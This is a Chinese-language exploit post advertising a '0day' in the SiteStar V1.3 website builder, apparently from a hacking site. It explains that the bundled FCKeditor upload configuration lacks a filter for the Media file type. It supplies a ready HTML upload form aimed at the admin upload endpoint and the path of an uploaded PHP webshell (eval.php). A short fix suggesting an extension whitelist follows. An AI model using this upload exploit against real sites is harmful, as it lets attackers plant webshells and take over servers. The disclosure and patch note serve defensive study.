建站之星建站系统 SiteStar V1.3 通杀0day

漏洞文件“/admin/fckeditor/upload/config.php”：

<?php
//省略代码
//Due to security issues with Apache modules, it is reccomended to leave the
//following setting enabled.
$Config['ForceSingleExtension'] = true ;
$Config['AllowedExtensions']['File']    = array() ;
$Config['DeniedExtensions']['File']     = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
$Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image']    = array() ;
$Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
$Config['DeniedExtensions']['Flash']    = array() ;
?>

测试方法：

和 Fckeditor 2.4.2 原理一样，以下为关键内容片段，详见：Fckeditor 2.4.2 php任意上传文件漏洞

“……”

2、漏洞利用

    既然“fckeditor/editor/filemanager/browser/default/connectors/php/config.php”已经过滤了，那就只能利用“fckeditor/editor/filemanager/upload/php/config.php”了。

    不过如果留意一下改配置文件，就能看到默认情况下“$Config['Enabled'] = false”，是不允许上传的；其次，看upload.php能发现，程序对上传文件夹作了比对，必须是Media，说明在windows下不影响，但在Linux下则必须是大写M的Media目录，如果是media则返回信息正常，但文件并未上传成功。

    提交后查看源码就能看到上传文件的位置。

3、漏洞修补

    最好用新版，要不就拷贝以下代码到“config.php”最后。

“……”

上传 EXP：

<form id="frmUpload" enctype="multipart/form-data" action="http://www.hackline.net/admin/fckeditor//upload//upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

上传 WebShell 地址：

http://域名/upload/media/eval.php

漏洞修复：

修改 config 文件，限制上传目录的脚本执行权限。

01.$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
02.$Config['DeniedExtensions']['Media'] = array() ;